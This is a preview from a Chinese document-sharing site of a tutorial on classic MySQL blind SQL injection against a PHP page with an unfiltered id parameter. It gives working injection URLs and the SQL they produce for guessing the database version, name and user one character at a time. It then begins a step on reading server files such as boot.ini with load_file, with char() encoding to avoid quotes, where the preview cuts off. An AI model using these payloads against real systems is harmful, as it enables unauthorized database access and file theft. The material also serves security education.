mysql经典注射

mysql经典注射

ID:32600341

大小:301.00 KB

页数:9页

时间:2019-02-13

mysql经典注射_第1页
mysql经典注射_第2页
mysql经典注射_第3页
mysql经典注射_第4页
mysql经典注射_第5页
资源描述:

《mysql经典注射》由会员上传分享,免费在线阅读,更多相关内容在学术论文-天天文库

1、标准实用Mysql经典注射前言:mysql4.0之前的版本不支持union语句,所以mysql4.0之前的版本的注射和其他版本的Mysql注射有很大的区别。Mysql4.0及其之后的版本的注射大多数是利用union联合查询来实现的,这种方法速度快,经典注射的方法在4.0及其版本的mysql也是可行的,但由于其方法复杂而不推荐使用。实现:当然首先要有一个注入点。发现内网http://192.168.0.1special_view.php存在注入漏洞。源代码如下:

2、fromspecialwhereid=".$id);if($row=mysql_fetch_array($result)){$id=$row[id];$title=$row[title];$date=$row["date"];$content=$row[content];Id没有过滤。因此http://192.168.0.1/special_view.php?id=16[sqlinjectionstatement]即可实现注入。1.猜解版本查询mysql版本的sql语句:SELECTversion();我们可以构造以下的url进行猜解:文案大全标准实用http://19

3、2.168.0.1/special_view.php?id=16%20and%20ascii(mid(version(),1,1))>96上面的url是猜版本号的第一位,我们用浏览器打开它时,myql数据库中执行了下面语句:select*fromspecialwhereid=16andascii(mid(version(),1,1))>96我们知道mysql的版本号的第一位是3,3的ascii码是51因此上面的语句为假,没有查询到任何结果。浏览器打开该url的结果如下:而http://192.168.0.1/special_view.php?id=16%20and%20

4、ascii(mid(version(),1,1))<96就不同了,在mysql数据库中执行下面的语句:select*fromspecialwhereid=16andascii(mid(version(),1,1))<96因为3的ascii码小于96所有上面的语句为真,执行的结果如下。因此浏览器就返回了正确的页面。文案大全标准实用同理,我们就可以猜解版本号的第2位,第3位。。。http://192.168.0.1/special_view.php?id=16%20and%20ascii(mid(version(),2,1))<96。。。2.猜解数据库名:查询数据库名是sq

5、l语句:SELECTdatabase()在浏览器中打开http://192.168.0.1/special_view.php?id=16%20and%20ascii(mid(database(),1,1))<96也就执行了下面的语句:select*fromspecialwhereid=16andascii(mid(database(),1,1))<96因为i的accii码文案大全标准实用105大于96,所以上面的语句为假,执行后查询不到任何结果。浏览器返回如下:在浏览器中打开http://192.168.0.1/special_view.php?id=16%20and%

6、20ascii(mid(database(),1,1))>96即在mysql数据库里执行:select*fromspecialwhereid=16andascii(mid(database(),1,1))>96因为i的accii码105大于96,所以上面的语句为真,myql数据库执行结果如下:在浏览器中打开结果如下:文案大全标准实用3.猜数据库用户原理和上面猜myql的版本和数据库名是一样的。只不过利用的函数是user()查询数据库用户名的sql语句:SELECTuser()构造http://192.168.0.1/special_view.php?id=16%20an

7、d%20ascii(mid(user(),1,1))>96等语句就可以实现对数据用户名的猜解,相当执行了下面语句:select*fromspecialwhereid=16andascii(mid(user(),1,1))>964.读文件读‘c:boot.ini’文件的sql语句:SELECTload_file(‘c:/boot.ini’)为了避开单引号,采取以下两种方式。文案大全标准实用SELECTload_file(char(99,58,92,98,111,111,116,46,105,110,105))或者SELECTload_fi

当前文档最多预览五页,下载文档查看全文

此文档下载收益归作者所有

当前文档最多预览五页,下载文档查看全文
温馨提示:
1. 部分包含数学公式或PPT动画的文件,查看预览时可能会显示错乱或异常,文件下载后无此问题,请放心下载。
2. 本文档由用户上传,版权归属用户,天天文库负责整理代发布。如果您对本文档版权有争议请及时联系客服。
3. 下载前请仔细阅读文档内容,确认文档内容符合您的需求后进行下载,若出现内容与标题不符可向本站投诉处理。
4. 下载文档时可能由于网络波动等原因无法下载或下载错误,付费完成后未能成功下载的用户请联系客服处理。